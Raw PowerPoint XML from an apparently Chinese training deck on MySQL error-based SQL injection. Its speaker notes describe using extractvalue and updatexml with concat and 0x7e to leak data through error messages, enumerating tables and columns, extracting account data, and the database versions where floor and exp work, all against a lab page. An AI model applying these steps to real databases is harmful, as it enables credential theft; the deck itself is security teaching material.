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575" r:id="rId2"/>
    <p:sldId id="336" r:id="rId3"/>
    <p:sldId id="474" r:id="rId4"/>
    <p:sldId id="576" r:id="rId5"/>
    <p:sldId id="577" r:id="rId6"/>
    <p:sldId id="578" r:id="rId7"/>
    <p:sldId id="579" r:id="rId8"/>
    <p:sldId id="580" r:id="rId9"/>
    <p:sldId id="581" r:id="rId10"/>
    <p:sldId id="582" r:id="rId11"/>
    <p:sldId id="583" r:id="rId12"/>
    <p:sldId id="584" r:id="rId13"/>
    <p:sldId id="585" r:id="rId14"/>
    <p:sldId id="586" r:id="rId15"/>
    <p:sldId id="587" r:id="rId16"/>
    <p:sldId id="588" r:id="rId17"/>
    <p:sldId id="589" r:id="rId18"/>
    <p:sldId id="590" r:id="rId19"/>
    <p:sldId id="591" r:id="rId20"/>
    <p:sldId id="592" r:id="rId21"/>
    <p:sldId id="593" r:id="rId22"/>
    <p:sldId id="594" r:id="rId23"/>
    <p:sldId id="595" r:id="rId24"/>
    <p:sldId id="596" r:id="rId25"/>
    <p:sldId id="597" r:id="rId26"/>
    <p:sldId id="598" r:id="rId27"/>
    <p:sldId id="599" r:id="rId28"/>
    <p:sldId id="600" r:id="rId29"/>
    <p:sldId id="601" r:id="rId30"/>
    <p:sldId id="602" r:id="rId31"/>
    <p:sldId id="603" r:id="rId32"/>
    <p:sldId id="604" r:id="rId33"/>
    <p:sldId id="605" r:id="rId34"/>
    <p:sldId id="473" r:id="rId35"/>
    <p:sldId id="606" r:id="rId36"/>
    <p:sldId id="527" r:id="rId37"/>
    <p:sldId id="529" r:id="rId38"/>
    <p:sldId id="530" r:id="rId39"/>
    <p:sldId id="531" r:id="rId40"/>
    <p:sldId id="532" r:id="rId41"/>
    <p:sldId id="533" r:id="rId42"/>
    <p:sldId id="534" r:id="rId43"/>
    <p:sldId id="535" r:id="rId44"/>
    <p:sldId id="536" r:id="rId45"/>
    <p:sldId id="537" r:id="rId46"/>
    <p:sldId id="540" r:id="rId47"/>
    <p:sldId id="541" r:id="rId48"/>
    <p:sldId id="490" r:id="rId49"/>
    <p:sldId id="607" r:id="rId50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4999"/>
    <a:srgbClr val="FCFDFA"/>
    <a:srgbClr val="FBFEFB"/>
    <a:srgbClr val="173A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21"/>
    <p:restoredTop sz="86306" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="106" d="100"/>
          <a:sy n="106" d="100"/>
        </p:scale>
        <p:origin x="69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4" d="100"/>
          <a:sy n="94" d="100"/>
        </p:scale>
        <p:origin x="296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52D740F-22AD-4849-8472-F50191CC9BD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A0838-00B4-0646-A6E5-797A7C76DF44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432230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CC81F-04A9-4342-96CD-CB9700F6E910}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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BED20C-72F8-6347-A583-F969C4DCD7E4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51643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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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73020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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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7420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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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dirty="0"/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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9050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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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dirty="0"/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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6135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利用 这个函数。在查询指定</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>内容出错时  输出我们要查询内容的机制， 构建</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>paylod</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>是连接符，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>  因为不属于函数参数的语法。产生错误。</a:t>
            </a:r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B201D-732D-C74C-8340-995C5721180C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2285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利用 这个函数。在查询指定</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>内容出错时  输出我们要查询内容的机制， 构建</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>paylod</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>是连接符，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>  因为不属于函数参数的语法。产生错误。</a:t>
            </a:r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B201D-732D-C74C-8340-995C5721180C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50022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利用 这个函数。在查询指定</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内容出错时  输出我们要查询内容的机制， 构建</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>paylod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concat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是连接符，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  因为不属于函数参数的语法。产生错误。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B201D-732D-C74C-8340-995C5721180C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67105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updatexml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利用的也是 对于更新的路径不正确，而输出报错路径的的机制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:b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B201D-732D-C74C-8340-995C5721180C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21957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updatexml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利用的也是 对于更新的路径不正确，而输出报错路径的的机制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:b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B201D-732D-C74C-8340-995C5721180C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64981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BED20C-72F8-6347-A583-F969C4DCD7E4}" type="slidenum">
              <a:rPr lang="x-none" smtClean="0"/>
              <a:pPr/>
              <a:t>21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749379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已经有的可以不用重新下载，直接启动镜像或者之前的容器</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/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B201D-732D-C74C-8340-995C5721180C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1183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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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67751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是一个输入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t> 地方</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>,id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>能获取用户名，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下方可以有按钮可以直接 看到源码。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B201D-732D-C74C-8340-995C5721180C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55080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单引号是用了闭合结构。成功报错。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B201D-732D-C74C-8340-995C5721180C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23190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构造语句。获取输出的版本信息，因为是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>型。可以再</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>框中写，但是不方便保存查看。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1"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MariaDB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数据库管理系统是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的一个分支，主要由开源社区在维护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开发这个分支的原因之一是：甲骨文公司收购了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后，有将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闭源的潜在风险，因此社区采用分支的方式来避开这个风险。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/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B201D-732D-C74C-8340-995C5721180C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16110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能够获取到用户和当前数据库的信息。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B201D-732D-C74C-8340-995C5721180C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06449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调整</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>位置获取另一张表为 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>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B201D-732D-C74C-8340-995C5721180C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25470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根据上一页面获取的表名获取列名。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最后就是根据列名获取具体的账户信息。</a:t>
            </a:r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B201D-732D-C74C-8340-995C5721180C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33315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  <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>报错注入不能输出多列多行信息。可以对输出信息进行组装拼接。</a:t>
            </a:r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/>
              <a:t>可以用来两种方式进行拼接。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t> 和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/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B201D-732D-C74C-8340-995C5721180C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25479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对于输出超过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>个字符的情况可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>MID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>函数进行拆分。拼接出 完整的内容，</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>可以用于密码长度过长的情况。</a:t>
            </a:r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B201D-732D-C74C-8340-995C5721180C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61762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除了本文江讲诉的两个函数外，还有其他许多报错注入函数 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>floor </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>需要版本在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.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floor </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本以上</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(5.5,5.6,maridb</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>经过测试可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> ，在 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8.0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 版本报错。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 1022 (23000): Can't write; duplicate key in table '/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/#sql1_b_6'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exp.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版本在 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5.5.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可以使用，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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maridb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5.6 8.0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无法触发， 可以理解为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5.6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及以上不能使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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报错注入和数据版本是强关联的。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B201D-732D-C74C-8340-995C5721180C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722019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BED20C-72F8-6347-A583-F969C4DCD7E4}" type="slidenum">
              <a:rPr lang="x-none" smtClean="0"/>
              <a:pPr/>
              <a:t>33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43940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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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64708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修改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B201D-732D-C74C-8340-995C5721180C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82897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有修改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B201D-732D-C74C-8340-995C5721180C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4469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BED20C-72F8-6347-A583-F969C4DCD7E4}" type="slidenum">
              <a:rPr lang="x-none" smtClean="0"/>
              <a:pPr/>
              <a:t>48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01065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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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2455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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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dirty="0"/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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6143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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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dirty="0"/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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1771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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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dirty="0"/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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3153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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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dirty="0"/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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1600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它的特点是注入速度快，但是语句较复杂。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 5.1.5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版本中添加了对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文档进行查询和修改的函数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两个函数的返回长度有限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均为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个字符长度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/>
              <a:t>本节主要介绍下面两种形式的报错，报错注入的方式不仅限于者两种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用于注入结果无回显但错误信息有输出的情况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B201D-732D-C74C-8340-995C5721180C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5095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EDFCA-6A70-804C-A28F-8578C657E5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F4FBD2-415D-484D-BD25-391B229CD8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EAD4C-0313-D44F-8F30-F6DED0293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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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07F97-57CE-994B-9779-177E8B530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2CDC30-71E1-FF4B-9826-C92E7118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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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19340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8D653-50E1-8947-BB05-67F0B8A8C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11C693-EDC2-2B4B-B5CC-413F634BF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5F9983-B558-0E49-9226-2E0958730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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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797BB-531A-0446-931F-1271D6B78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52BF4-DFEE-D349-BE1D-6EC9C328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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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67000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BB283B-EA97-AC4E-A43F-866A1933B7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547E66-1E8C-9745-A1DB-7045D73DF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A5CE7-4FC3-934C-BD93-A46CB7654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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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9C4F0-3E0B-3545-99D1-0B82ABAF7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ADEFF-4F60-664D-8DB8-B5ECBFBB2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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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99790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新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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3B9FB02-04E3-BF42-A357-AC989A1EF7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1489006" y="2560042"/>
            <a:ext cx="737727" cy="1042070"/>
            <a:chOff x="1238250" y="2264138"/>
            <a:chExt cx="768350" cy="1085326"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Connector 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EBD8C55-40C0-1E40-ABE0-6E3A34299BF5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3349464"/>
              <a:ext cx="768350" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:srgbClr val="1D4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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D633B265-F335-CE45-AAD1-D9C3BE664AFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1238250" y="2264138"/>
              <a:ext cx="768350" cy="764490"/>
              <a:chOff x="1238250" y="2264138"/>
              <a:chExt cx="768350" cy="764490"/>
            </a:xfrm>
          </p:grpSpPr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FDCFC76D-08CB-2B41-BA30-A90DC38B25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5664" y="2264138"/>
                <a:ext cx="640936" cy="571437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 166 w 166"/>
                  <a:gd name="T1" fmla="*/ 0 h 148"/>
                  <a:gd name="T2" fmla="*/ 48 w 166"/>
                  <a:gd name="T3" fmla="*/ 148 h 148"/>
                  <a:gd name="T4" fmla="*/ 0 w 166"/>
                  <a:gd name="T5" fmla="*/ 10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6" h="148">
                    <a:moveTo>
                      <a:pt x="166" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="100"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="15875" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="1D499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600"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endParaRPr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6A8816E4-9687-894B-AAAC-D90489665B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8250" y="2364526"/>
                <a:ext cx="660243" cy="664102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 171 w 171"/>
                  <a:gd name="T1" fmla="*/ 62 h 172"/>
                  <a:gd name="T2" fmla="*/ 171 w 171"/>
                  <a:gd name="T3" fmla="*/ 172 h 172"/>
                  <a:gd name="T4" fmla="*/ 0 w 171"/>
                  <a:gd name="T5" fmla="*/ 172 h 172"/>
                  <a:gd name="T6" fmla="*/ 0 w 171"/>
                  <a:gd name="T7" fmla="*/ 0 h 172"/>
                  <a:gd name="T8" fmla="*/ 119 w 171"/>
                  <a:gd name="T9" fmla="*/ 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172">
                    <a:moveTo>
                      <a:pt x="171" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="171" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="15875" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="1D499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600" dirty="0"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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp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81567BEF-5A71-4B4B-BE1F-6214607A0641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-255181" y="3636286"/>
            <a:ext cx="1271653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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2BD3236-9936-1948-9F0F-C29DA5D74DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1385208" y="2156346"/>
            <a:ext cx="860063" cy="1229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0BCB56C4-37BA-674B-99C0-B1E61C214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89075" y="3906000"/>
            <a:ext cx="4699000" cy="6223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accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr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b="0" i="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01</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="0" i="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课程主题 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="0" i="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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="0" i="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章节标题</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/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21877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展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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14054E9E-0F76-D748-84B2-3556AD3E074B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line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内容占位符 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4087A304-E857-444A-ABFC-B1C6F282DF6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3600" y="306000"/>
            <a:ext cx="5307299" cy="529297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kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>开发工具</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="内容占位符 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C7518F-241E-4445-9C9D-BF588D10A72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2045335" y="1848825"/>
            <a:ext cx="4945203" cy="355624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chemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标题文本</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr kumimoji="1" lang="en-US" alt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AA6C063-3E45-254F-961C-6B4BA8E219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44700" y="2754000"/>
            <a:ext cx="4945063" cy="12223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内容文字编辑详述</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0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1F3AC0B9-4CEF-5149-915F-CA1A0E9CB6F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8561" y="1510699"/>
            <a:ext cx="1074738" cy="1031875"/>
          </a:xfrm>
        </p:spPr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9784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展示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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7562F9FE-7978-AA41-A91C-C2F99412B475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8052420" y="3058546"/>
            <a:ext cx="90164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b="1" dirty="0">
